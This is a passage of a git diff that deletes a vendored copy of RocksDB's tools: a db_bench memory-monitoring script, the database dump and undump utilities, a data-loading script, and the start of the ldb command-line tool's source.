-This program will run the db_bench script to monitor memory usage
-using the 'pflag' program. It launches db_bench with default settings
-for certain arguments. You can change the defaults passed to
-'db_bench' program, by setting the following environment 
-variables:
-
-  bs [block_size]
-  ztype [compression_type]
-  benches [benchmarks]
-  reads [reads]
-  threads [threads]
-  cs [cache_size]
-  vsize [value_size]
-  comp [compression_ratio]
-  num [num]
-
-See the code for more info
-
-HELP
-
-}
-
-[ ! -x ${DB_BENCH} ] && echo "WARNING: ${DB_BENCH} doesn't exist, abort!" && exit -1;
-
-[ "x$1" = "x-h" ] && usage;
-
-trap 'rm -f ${LOG}; kill ${PID}; echo "Interrupted, exiting";' 1 2 3 15
-
-touch $LOG;
-
-: ${bs:=16384}
-: ${ztype:=zlib}
-: ${benches:=readwhilewriting}
-: ${reads:=$((1*1024*1024))};
-: ${threads:=8}
-: ${vsize:=2000}
-: ${comp:=0.5}
-: ${num:=10000}
-: ${cs:=$((1*1024*1024*1024))};
-
-DEBUG=1    #Set to 0 to remove chattiness 
-
-
-if [ "x$DEBUG" != "x" ]; then
-  #
-  #NOTE: under some circumstances, --use_existing_db may leave LOCK files under ${TMPDIR}/rocksdb/*
-  #cleanup the dir and re-run
-  #
-  echo DEBUG: Will run $DB_BENCH --block_size=$bs --compression_type=$ztype --benchmarks="$benches" --reads="$reads" --threads="$threads" --cache_size=$cs  --value_size=$vsize --compression_ratio=$comp --num=$num --use_existing_db 
-
-fi
-
-$DB_BENCH --block_size=$bs --compression_type=$ztype --benchmarks="$benches" --reads="$reads" --threads="$threads" --cache_size=$cs  --value_size=$vsize --compression_ratio=$comp --num=$num --use_existing_db >$LOG 2>&1 &
-
-if [ $? -ne 0 ]; then
-  warn "WARNING: ${DB_BENCH} did not launch successfully! Abort!";
-  exit;
-fi
-PID=$!
-
-#
-#Start the monitoring. Default is "vsz" monitoring for upto cache_size ($cs) value of virtual mem
-#You could also monitor RSS and CPUTIME (bsdtime). Try 'pflag -h' for how to do this
-#
-${PFLAG} -p $PID -v
-
-rm -f $LOG;
diff --git a/thirdparty/rocksdb/tools/dump/db_dump_tool.cc b/thirdparty/rocksdb/tools/dump/db_dump_tool.cc
deleted file mode 100644
index 8c5fa82..0000000
--- a/thirdparty/rocksdb/tools/dump/db_dump_tool.cc
+++ /dev/null
@@ -1,261 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <iostream>
-
-#include "rocksdb/db.h"
-#include "rocksdb/db_dump_tool.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-bool DbDumpTool::Run(const DumpOptions& dump_options,
-                     rocksdb::Options options) {
-  rocksdb::DB* dbptr;
-  rocksdb::Status status;
-  std::unique_ptr<rocksdb::WritableFile> dumpfile;
-  char hostname[1024];
-  int64_t timesec = 0;
-  std::string abspath;
-  char json[4096];
-
-  static const char* magicstr = "ROCKDUMP";
-  static const char versionstr[8] = {0, 0, 0, 0, 0, 0, 0, 1};
-
-  rocksdb::Env* env = rocksdb::Env::Default();
-
-  // Open the database
-  options.create_if_missing = false;
-  status = rocksdb::DB::OpenForReadOnly(options, dump_options.db_path, &dbptr);
-  if (!status.ok()) {
-    std::cerr << "Unable to open database '" << dump_options.db_path
-              << "' for reading: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  const std::unique_ptr<rocksdb::DB> db(dbptr);
-
-  status = env->NewWritableFile(dump_options.dump_location, &dumpfile,
-                                rocksdb::EnvOptions());
-  if (!status.ok()) {
-    std::cerr << "Unable to open dump file '" << dump_options.dump_location
-              << "' for writing: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  rocksdb::Slice magicslice(magicstr, 8);
-  status = dumpfile->Append(magicslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  rocksdb::Slice versionslice(versionstr, 8);
-  status = dumpfile->Append(versionslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  if (dump_options.anonymous) {
-    snprintf(json, sizeof(json), "{}");
-  } else {
-    status = env->GetHostName(hostname, sizeof(hostname));
-    status = env->GetCurrentTime(&timesec);
-    status = env->GetAbsolutePath(dump_options.db_path, &abspath);
-    snprintf(json, sizeof(json),
-             "{ \"database-path\": \"%s\", \"hostname\": \"%s\", "
-             "\"creation-time\": %" PRIi64 " }",
-             abspath.c_str(), hostname, timesec);
-  }
-
-  rocksdb::Slice infoslice(json, strlen(json));
-  char infosize[4];
-  rocksdb::EncodeFixed32(infosize, (uint32_t)infoslice.size());
-  rocksdb::Slice infosizeslice(infosize, 4);
-  status = dumpfile->Append(infosizeslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-  status = dumpfile->Append(infoslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  const std::unique_ptr<rocksdb::Iterator> it(
-      db->NewIterator(rocksdb::ReadOptions()));
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    char keysize[4];
-    rocksdb::EncodeFixed32(keysize, (uint32_t)it->key().size());
-    rocksdb::Slice keysizeslice(keysize, 4);
-    status = dumpfile->Append(keysizeslice);
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-    status = dumpfile->Append(it->key());
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-
-    char valsize[4];
-    rocksdb::EncodeFixed32(valsize, (uint32_t)it->value().size());
-    rocksdb::Slice valsizeslice(valsize, 4);
-    status = dumpfile->Append(valsizeslice);
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-    status = dumpfile->Append(it->value());
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-  }
-  if (!it->status().ok()) {
-    std::cerr << "Database iteration failed: " << status.ToString()
-              << std::endl;
-    return false;
-  }
-  return true;
-}
-
-bool DbUndumpTool::Run(const UndumpOptions& undump_options,
-                       rocksdb::Options options) {
-  rocksdb::DB* dbptr;
-  rocksdb::Status status;
-  rocksdb::Env* env;
-  std::unique_ptr<rocksdb::SequentialFile> dumpfile;
-  rocksdb::Slice slice;
-  char scratch8[8];
-
-  static const char* magicstr = "ROCKDUMP";
-  static const char versionstr[8] = {0, 0, 0, 0, 0, 0, 0, 1};
-
-  env = rocksdb::Env::Default();
-
-  status = env->NewSequentialFile(undump_options.dump_location, &dumpfile,
-                                  rocksdb::EnvOptions());
-  if (!status.ok()) {
-    std::cerr << "Unable to open dump file '" << undump_options.dump_location
-              << "' for reading: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  status = dumpfile->Read(8, &slice, scratch8);
-  if (!status.ok() || slice.size() != 8 ||
-      memcmp(slice.data(), magicstr, 8) != 0) {
-    std::cerr << "File '" << undump_options.dump_location
-              << "' is not a recognizable dump file." << std::endl;
-    return false;
-  }
-
-  status = dumpfile->Read(8, &slice, scratch8);
-  if (!status.ok() || slice.size() != 8 ||
-      memcmp(slice.data(), versionstr, 8) != 0) {
-    std::cerr << "File '" << undump_options.dump_location
-              << "' version not recognized." << std::endl;
-    return false;
-  }
-
-  status = dumpfile->Read(4, &slice, scratch8);
-  if (!status.ok() || slice.size() != 4) {
-    std::cerr << "Unable to read info blob size." << std::endl;
-    return false;
-  }
-  uint32_t infosize = rocksdb::DecodeFixed32(slice.data());
-  status = dumpfile->Skip(infosize);
-  if (!status.ok()) {
-    std::cerr << "Unable to skip info blob: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  options.create_if_missing = true;
-  status = rocksdb::DB::Open(options, undump_options.db_path, &dbptr);
-  if (!status.ok()) {
-    std::cerr << "Unable to open database '" << undump_options.db_path
-              << "' for writing: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  const std::unique_ptr<rocksdb::DB> db(dbptr);
-
-  uint32_t last_keysize = 64;
-  size_t last_valsize = 1 << 20;
-  std::unique_ptr<char[]> keyscratch(new char[last_keysize]);
-  std::unique_ptr<char[]> valscratch(new char[last_valsize]);
-
-  while (1) {
-    uint32_t keysize, valsize;
-    rocksdb::Slice keyslice;
-    rocksdb::Slice valslice;
-
-    status = dumpfile->Read(4, &slice, scratch8);
-    if (!status.ok() || slice.size() != 4) break;
-    keysize = rocksdb::DecodeFixed32(slice.data());
-    if (keysize > last_keysize) {
-      while (keysize > last_keysize) last_keysize *= 2;
-      keyscratch = std::unique_ptr<char[]>(new char[last_keysize]);
-    }
-
-    status = dumpfile->Read(keysize, &keyslice, keyscratch.get());
-    if (!status.ok() || keyslice.size() != keysize) {
-      std::cerr << "Key read failure: "
-                << (status.ok() ? "insufficient data" : status.ToString())
-                << std::endl;
-      return false;
-    }
-
-    status = dumpfile->Read(4, &slice, scratch8);
-    if (!status.ok() || slice.size() != 4) {
-      std::cerr << "Unable to read value size: "
-                << (status.ok() ? "insufficient data" : status.ToString())
-                << std::endl;
-      return false;
-    }
-    valsize = rocksdb::DecodeFixed32(slice.data());
-    if (valsize > last_valsize) {
-      while (valsize > last_valsize) last_valsize *= 2;
-      valscratch = std::unique_ptr<char[]>(new char[last_valsize]);
-    }
-
-    status = dumpfile->Read(valsize, &valslice, valscratch.get());
-    if (!status.ok() || valslice.size() != valsize) {
-      std::cerr << "Unable to read value: "
-                << (status.ok() ? "insufficient data" : status.ToString())
-                << std::endl;
-      return false;
-    }
-
-    status = db->Put(rocksdb::WriteOptions(), keyslice, valslice);
-    if (!status.ok()) {
-      fprintf(stderr, "Unable to write database entry\n");
-      return false;
-    }
-  }
-
-  if (undump_options.compact_db) {
-    status = db->CompactRange(rocksdb::CompactRangeOptions(), nullptr, nullptr);
-    if (!status.ok()) {
-      fprintf(stderr,
-              "Unable to compact the database after loading the dumped file\n");
-      return false;
-    }
-  }
-  return true;
-}
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/dump/rocksdb_dump.cc b/thirdparty/rocksdb/tools/dump/rocksdb_dump.cc
deleted file mode 100644
index ddbfc2f..0000000
--- a/thirdparty/rocksdb/tools/dump/rocksdb_dump.cc
+++ /dev/null
@@ -1,63 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if !(defined GFLAGS) || defined(ROCKSDB_LITE)
-
-#include <cstdio>
-int main() {
-#ifndef GFLAGS
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-#endif
-#ifdef ROCKSDB_LITE
-  fprintf(stderr, "DbDumpTool is not supported in ROCKSDB_LITE\n");
-#endif
-  return 1;
-}
-
-#else
-
-#include <gflags/gflags.h>
-#include "rocksdb/convenience.h"
-#include "rocksdb/db_dump_tool.h"
-
-DEFINE_string(db_path, "", "Path to the db that will be dumped");
-DEFINE_string(dump_location, "", "Path to where the dump file location");
-DEFINE_bool(anonymous, false,
-            "Remove information like db path, creation time from dumped file");
-DEFINE_string(db_options, "",
-              "Options string used to open the database that will be dumped");
-
-int main(int argc, char** argv) {
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-
-  if (FLAGS_db_path == "" || FLAGS_dump_location == "") {
-    fprintf(stderr, "Please set --db_path and --dump_location\n");
-    return 1;
-  }
-
-  rocksdb::DumpOptions dump_options;
-  dump_options.db_path = FLAGS_db_path;
-  dump_options.dump_location = FLAGS_dump_location;
-  dump_options.anonymous = FLAGS_anonymous;
-
-  rocksdb::Options db_options;
-  if (FLAGS_db_options != "") {
-    rocksdb::Options parsed_options;
-    rocksdb::Status s = rocksdb::GetOptionsFromString(
-        db_options, FLAGS_db_options, &parsed_options);
-    if (!s.ok()) {
-      fprintf(stderr, "Cannot parse provided db_options\n");
-      return 1;
-    }
-    db_options = parsed_options;
-  }
-
-  rocksdb::DbDumpTool tool;
-  if (!tool.Run(dump_options, db_options)) {
-    return 1;
-  }
-  return 0;
-}
-#endif  // !(defined GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/tools/dump/rocksdb_undump.cc b/thirdparty/rocksdb/tools/dump/rocksdb_undump.cc
deleted file mode 100644
index 0d04cca..0000000
--- a/thirdparty/rocksdb/tools/dump/rocksdb_undump.cc
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if !(defined GFLAGS) || defined(ROCKSDB_LITE)
-
-#include <cstdio>
-int main() {
-#ifndef GFLAGS
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-#endif
-#ifdef ROCKSDB_LITE
-  fprintf(stderr, "DbUndumpTool is not supported in ROCKSDB_LITE\n");
-#endif
-  return 1;
-}
-
-#else
-
-#include <gflags/gflags.h>
-#include "rocksdb/convenience.h"
-#include "rocksdb/db_dump_tool.h"
-
-DEFINE_string(dump_location, "", "Path to the dump file that will be loaded");
-DEFINE_string(db_path, "", "Path to the db that we will undump the file into");
-DEFINE_bool(compact, false, "Compact the db after loading the dumped file");
-DEFINE_string(db_options, "",
-              "Options string used to open the database that will be loaded");
-
-int main(int argc, char **argv) {
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-
-  if (FLAGS_db_path == "" || FLAGS_dump_location == "") {
-    fprintf(stderr, "Please set --db_path and --dump_location\n");
-    return 1;
-  }
-
-  rocksdb::UndumpOptions undump_options;
-  undump_options.db_path = FLAGS_db_path;
-  undump_options.dump_location = FLAGS_dump_location;
-  undump_options.compact_db = FLAGS_compact;
-
-  rocksdb::Options db_options;
-  if (FLAGS_db_options != "") {
-    rocksdb::Options parsed_options;
-    rocksdb::Status s = rocksdb::GetOptionsFromString(
-        db_options, FLAGS_db_options, &parsed_options);
-    if (!s.ok()) {
-      fprintf(stderr, "Cannot parse provided db_options\n");
-      return 1;
-    }
-    db_options = parsed_options;
-  }
-
-  rocksdb::DbUndumpTool tool;
-  if (!tool.Run(undump_options, db_options)) {
-    return 1;
-  }
-  return 0;
-}
-#endif  // !(defined GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/tools/generate_random_db.sh b/thirdparty/rocksdb/tools/generate_random_db.sh
deleted file mode 100755
index e10843b..0000000
--- a/thirdparty/rocksdb/tools/generate_random_db.sh
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env bash
-#
-# A shell script to load some pre generated data file to a DB using ldb tool
-# ./ldb needs to be avaible to be executed.
-#
-# Usage: <SCRIPT> <input_data_path> <DB Path>
-
-if [ "$#" -lt 2 ]; then
-  echo "usage: $BASH_SOURCE <input_data_path> <DB Path>"
-  exit 1
-fi
-
-input_data_dir=$1
-db_dir=$2
-rm -rf $db_dir
-
-echo == Loading data from $input_data_dir to $db_dir
-
-declare -a compression_opts=("no" "snappy" "zlib" "bzip2")
-
-set -e
-
-n=0
-
-for f in `ls -1 $input_data_dir`
-do
-  echo == Loading $f with compression ${compression_opts[n % 4]}
-  ./ldb load --db=$db_dir --compression_type=${compression_opts[n % 4]} --bloom_bits=10 --auto_compaction=false --create_if_missing < $input_data_dir/$f
-  let "n = n + 1"
-done
diff --git a/thirdparty/rocksdb/tools/ldb.cc b/thirdparty/rocksdb/tools/ldb.cc
deleted file mode 100644
index 6f70de6..0000000
--- a/thirdparty/rocksdb/tools/ldb.cc
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/ldb_tool.h"
-
-int main(int argc, char** argv) {
-  rocksdb::LDBTool tool;
-  tool.Run(argc, argv);
-  return 0;
-}
-#else
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/ldb_cmd.cc b/thirdparty/rocksdb/tools/ldb_cmd.cc
deleted file mode 100644
index c8b6221..0000000
--- a/thirdparty/rocksdb/tools/ldb_cmd.cc
+++ /dev/null
@@ -1,2898 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "rocksdb/utilities/ldb_cmd.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/log_reader.h"
-#include "db/write_batch_internal.h"
-#include "port/dirent.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/debug.h"
-#include "rocksdb/utilities/object_registry.h"
-#include "rocksdb/utilities/options_util.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "tools/ldb_cmd_impl.h"
-#include "tools/sst_dump_tool_imp.h"
-#include "util/cast_util.h"
-#include "util/coding.h"
-#include "util/filename.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "utilities/ttl/db_ttl_impl.h"
-
-#include <cstdlib>
-#include <ctime>
-#include <fstream>
-#include <functional>
-#include <iostream>
-#include <limits>
-#include <sstream>
-#include <stdexcept>
-#include <string>
-
-namespace rocksdb {
-
-const std::string LDBCommand::ARG_DB = "db";
-const std::string LDBCommand::ARG_PATH = "path";
-const std::string LDBCommand::ARG_HEX = "hex";
-const std::string LDBCommand::ARG_KEY_HEX = "key_hex";
-const std::string LDBCommand::ARG_VALUE_HEX = "value_hex";
-const std::string LDBCommand::ARG_CF_NAME = "column_family";
-const std::string LDBCommand::ARG_TTL = "ttl";
-const std::string LDBCommand::ARG_TTL_START = "start_time";
-const std::string LDBCommand::ARG_TTL_END = "end_time";
-const std::string LDBCommand::ARG_TIMESTAMP = "timestamp";
-const std::string LDBCommand::ARG_TRY_LOAD_OPTIONS = "try_load_options";
-const std::string LDBCommand::ARG_IGNORE_UNKNOWN_OPTIONS =
-    "ignore_unknown_options";
-const std::string LDBCommand::ARG_FROM = "from";
-const std::string LDBCommand::ARG_TO = "to";
-const std::string LDBCommand::ARG_MAX_KEYS = "max_keys";
-const std::string LDBCommand::ARG_BLOOM_BITS = "bloom_bits";
-const std::string LDBCommand::ARG_FIX_PREFIX_LEN = "fix_prefix_len";
-const std::string LDBCommand::ARG_COMPRESSION_TYPE = "compression_type";
-const std::string LDBCommand::ARG_COMPRESSION_MAX_DICT_BYTES =
-    "compression_max_dict_bytes";
-const std::string LDBCommand::ARG_BLOCK_SIZE = "block_size";
-const std::string LDBCommand::ARG_AUTO_COMPACTION = "auto_compaction";
-const std::string LDBCommand::ARG_DB_WRITE_BUFFER_SIZE = "db_write_buffer_size";
-const std::string LDBCommand::ARG_WRITE_BUFFER_SIZE = "write_buffer_size";
-const std::string LDBCommand::ARG_FILE_SIZE = "file_size";
-const std::string LDBCommand::ARG_CREATE_IF_MISSING = "create_if_missing";
-const std::string LDBCommand::ARG_NO_VALUE = "no_value";
-
-const char* LDBCommand::DELIM = " ==> ";
-
-namespace {
-
-void DumpWalFile(std::string wal_file, bool print_header, bool print_values,
-                 LDBCommandExecuteResult* exec_state);
-
-void DumpSstFile(std::string filename, bool output_hex, bool show_properties);
-};
-
-LDBCommand* LDBCommand::InitFromCmdLineArgs(
-    int argc, char** argv, const Options& options,
-    const LDBOptions& ldb_options,
-    const std::vector<ColumnFamilyDescriptor>* column_families) {
-  std::vector<std::string> args;
-  for (int i = 1; i < argc; i++) {
-    args.push_back(argv[i]);
-  }
-  return InitFromCmdLineArgs(args, options, ldb_options, column_families,
-                             SelectCommand);
-}
-
-/**
- * Parse the command-line arguments and create the appropriate LDBCommand2
- * instance.
- * The command line arguments must be in the following format:
- * ./ldb --db=PATH_TO_DB [--commonOpt1=commonOpt1Val] ..
- *        COMMAND <PARAM1> <PARAM2> ... [-cmdSpecificOpt1=cmdSpecificOpt1Val] ..
- * This is similar to the command line format used by HBaseClientTool.
- * Command name is not included in args.
- * Returns nullptr if the command-line cannot be parsed.
- */
-LDBCommand* LDBCommand::InitFromCmdLineArgs(
-    const std::vector<std::string>& args, const Options& options,
-    const LDBOptions& ldb_options,
-    const std::vector<ColumnFamilyDescriptor>* column_families,
-    const std::function<LDBCommand*(const ParsedParams&)>& selector) {
-  // --x=y command line arguments are added as x->y map entries in
-  // parsed_params.option_map.
-  //
-  // Command-line arguments of the form --hex end up in this array as hex to
-  // parsed_params.flags
-  ParsedParams parsed_params;
-
-  // Everything other than option_map and flags. Represents commands
-  // and their parameters.  For eg: put key1 value1 go into this vector.
-  std::vector<std::string> cmdTokens;
-
-  const std::string OPTION_PREFIX = "--";
-
-  for (const auto& arg : args) {
-    if (arg[0] == '-' && arg[1] == '-'){
-      std::vector<std::string> splits = StringSplit(arg, '=');
-      if (splits.size() == 2) {
-        std::string optionKey = splits[0].substr(OPTION_PREFIX.size());
-        parsed_params.option_map[optionKey] = splits[1];
-      } else {
-        std::string optionKey = splits[0].substr(OPTION_PREFIX.size());
-        parsed_params.flags.push_back(optionKey);
-      }
-    } else {
-      cmdTokens.push_back(arg);
-    }
-  }
-
-  if (cmdTokens.size() < 1) {
-    fprintf(stderr, "Command not specified!");
-    return nullptr;
-  }
-
-  parsed_params.cmd = cmdTokens[0];
-  parsed_params.cmd_params.assign(cmdTokens.begin() + 1, cmdTokens.end());
-
-  LDBCommand* command = selector(parsed_params);
-
-  if (command) {
-    command->SetDBOptions(options);
-    command->SetLDBOptions(ldb_options);
-  }
-  return command;
-}
-
-LDBCommand* LDBCommand::SelectCommand(const ParsedParams& parsed_params) {
-  if (parsed_params.cmd == GetCommand::Name()) {
-    return new GetCommand(parsed_params.cmd_params, parsed_params.option_map,
-                          parsed_params.flags);
-  } else if (parsed_params.cmd == PutCommand::Name()) {
-    return new PutCommand(parsed_params.cmd_params, parsed_params.option_map,
-                          parsed_params.flags);
-  } else if (parsed_params.cmd == BatchPutCommand::Name()) {
-    return new BatchPutCommand(parsed_params.cmd_params,
-                               parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == ScanCommand::Name()) {
-    return new ScanCommand(parsed_params.cmd_params, parsed_params.option_map,
-                           parsed_params.flags);
-  } else if (parsed_params.cmd == DeleteCommand::Name()) {
-    return new DeleteCommand(parsed_params.cmd_params, parsed_params.option_map,
-                             parsed_params.flags);
-  } else if (parsed_params.cmd == DeleteRangeCommand::Name()) {
-    return new DeleteRangeCommand(parsed_params.cmd_params,
-                                  parsed_params.option_map,
-                                  parsed_params.flags);
-  } else if (parsed_params.cmd == ApproxSizeCommand::Name()) {
-    return new ApproxSizeCommand(parsed_params.cmd_params,
-                                 parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == DBQuerierCommand::Name()) {
-    return new DBQuerierCommand(parsed_params.cmd_params,
-                                parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == CompactorCommand::Name()) {
-    return new CompactorCommand(parsed_params.cmd_params,
-                                parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == WALDumperCommand::Name()) {
-    return new WALDumperCommand(parsed_params.cmd_params,
-                                parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == ReduceDBLevelsCommand::Name()) {
-    return new ReduceDBLevelsCommand(parsed_params.cmd_params,
-                                     parsed_params.option_map,
-                                     parsed_params.flags);
-  } else if (parsed_params.cmd == ChangeCompactionStyleCommand::Name()) {
-    return new ChangeCompactionStyleCommand(parsed_params.cmd_params,
-                                            parsed_params.option_map,
-                                            parsed_params.flags);
-  } else if (parsed_params.cmd == DBDumperCommand::Name()) {
-    return new DBDumperCommand(parsed_params.cmd_params,
-                               parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == DBLoaderCommand::Name()) {
-    return new DBLoaderCommand(parsed_params.cmd_params,
-                               parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == ManifestDumpCommand::Name()) {
-    return new ManifestDumpCommand(parsed_params.cmd_params,
-                                   parsed_params.option_map,
-                                   parsed_params.flags);
-  } else if (parsed_params.cmd == ListColumnFamiliesCommand::Name()) {
-    return new ListColumnFamiliesCommand(parsed_params.cmd_params,
-                                         parsed_params.option_map,
-                                         parsed_params.flags);
-  } else if (parsed_params.cmd == CreateColumnFamilyCommand::Name()) {
-    return new CreateColumnFamilyCommand(parsed_params.cmd_params,
-                                         parsed_params.option_map,
-                                         parsed_params.flags);
-  } else if (parsed_params.cmd == DBFileDumperCommand::Name()) {
-    return new DBFileDumperCommand(parsed_params.cmd_params,
-                                   parsed_params.option_map,
-                                   parsed_params.flags);
-  } else if (parsed_params.cmd == InternalDumpCommand::Name()) {
-    return new InternalDumpCommand(parsed_params.cmd_params,
-                                   parsed_params.option_map,
-                                   parsed_params.flags);
-  } else if (parsed_params.cmd == CheckConsistencyCommand::Name()) {
-    return new CheckConsistencyCommand(parsed_params.cmd_params,
-                                       parsed_params.option_map,
-                                       parsed_params.flags);
-  } else if (parsed_params.cmd == CheckPointCommand::Name()) {
-    return new CheckPointCommand(parsed_params.cmd_params,
-                                 parsed_params.option_map,
-                                 parsed_params.flags);
-  } else if (parsed_params.cmd == RepairCommand::Name()) {
-    return new RepairCommand(parsed_params.cmd_params, parsed_params.option_map,
-                             parsed_params.flags);
-  } else if (parsed_params.cmd == BackupCommand::Name()) {
-    return new BackupCommand(parsed_params.cmd_params, parsed_params.option_map,
-                             parsed_params.flags);
-  } else if (parsed_params.cmd == RestoreCommand::Name()) {
-    return new RestoreCommand(parsed_params.cmd_params,
-                              parsed_params.option_map, parsed_params.flags);
-  }
-  return nullptr;
-}
-
-/* Run the command, and return the execute result. */
-void LDBCommand::Run() {
-  if (!exec_state_.IsNotStarted()) {
-    return;
-  }
-
-  if (db_ == nullptr && !NoDBOpen()) {
-    OpenDB();
-    if (exec_state_.IsFailed() && try_load_options_) {
-      // We don't always return if there is a failure because a WAL file or
-      // manifest file can be given to "dump" command so we should continue.
-      // --try_load_options is not valid in those cases.
-      return;
-    }
-  }
-
-  // We'll intentionally proceed even if the DB can't be opened because users
-  // can also specify a filename, not just a directory.
-  DoCommand();
-
-  if (exec_state_.IsNotStarted()) {
-    exec_state_ = LDBCommandExecuteResult::Succeed("");
-  }
-
-  if (db_ != nullptr) {
-    CloseDB();
-  }
-}
-
-LDBCommand::LDBCommand(const std::map<std::string, std::string>& options,
-                       const std::vector<std::string>& flags, bool is_read_only,
-                       const std::vector<std::string>& valid_cmd_line_options)
-    : db_(nullptr),
-      is_read_only_(is_read_only),
-      is_key_hex_(false),
-      is_value_hex_(false),
-      is_db_ttl_(false),
-      timestamp_(false),
-      try_load_options_(false),
-      ignore_unknown_options_(false),
-      create_if_missing_(false),
-      option_map_(options),
-      flags_(flags),
-      valid_cmd_line_options_(valid_cmd_line_options) {
-  std::map<std::string, std::string>::const_iterator itr = options.find(ARG_DB);
-  if (itr != options.end()) {
-    db_path_ = itr->second;
-  }
-
-  itr = options.find(ARG_CF_NAME);
-  if (itr != options.end()) {
-    column_family_name_ = itr->second;
-  } else {
-    column_family_name_ = kDefaultColumnFamilyName;
-  }
-
-  is_key_hex_ = IsKeyHex(options, flags);
-  is_value_hex_ = IsValueHex(options, flags);
-  is_db_ttl_ = IsFlagPresent(flags, ARG_TTL);
-  timestamp_ = IsFlagPresent(flags, ARG_TIMESTAMP);
-  try_load_options_ = IsFlagPresent(flags, ARG_TRY_LOAD_OPTIONS);
-  ignore_unknown_options_ = IsFlagPresent(flags, ARG_IGNORE_UNKNOWN_OPTIONS);
-}
-
-void LDBCommand::OpenDB() {
-  Options opt;
-  bool opt_set = false;
-  if (!create_if_missing_ && try_load_options_) {
-    Status s = LoadLatestOptions(db_path_, Env::Default(), &opt,
-                                 &column_families_, ignore_unknown_options_);
-    if (s.ok()) {
-      opt_set = true;
-    } else if (!s.IsNotFound()) {
-      // Option file exists but load option file error.
-      std::string msg = s.ToString();
-      exec_state_ = LDBCommandExecuteResult::Failed(msg);
-      db_ = nullptr;
-      return;
-    }
-  }
-  if (!opt_set) {
-    opt = PrepareOptionsForOpenDB();
-  }
-  if (!exec_state_.IsNotStarted()) {
-    return;
-  }
-  // Open the DB.
-  Status st;
-  std::vector<ColumnFamilyHandle*> handles_opened;
-  if (is_db_ttl_) {
-    // ldb doesn't yet support TTL DB with multiple column families
-    if (!column_family_name_.empty() || !column_families_.empty()) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "ldb doesn't support TTL DB with multiple column families");
-    }
-    if (is_read_only_) {
-      st = DBWithTTL::Open(opt, db_path_, &db_ttl_, 0, true);
-    } else {
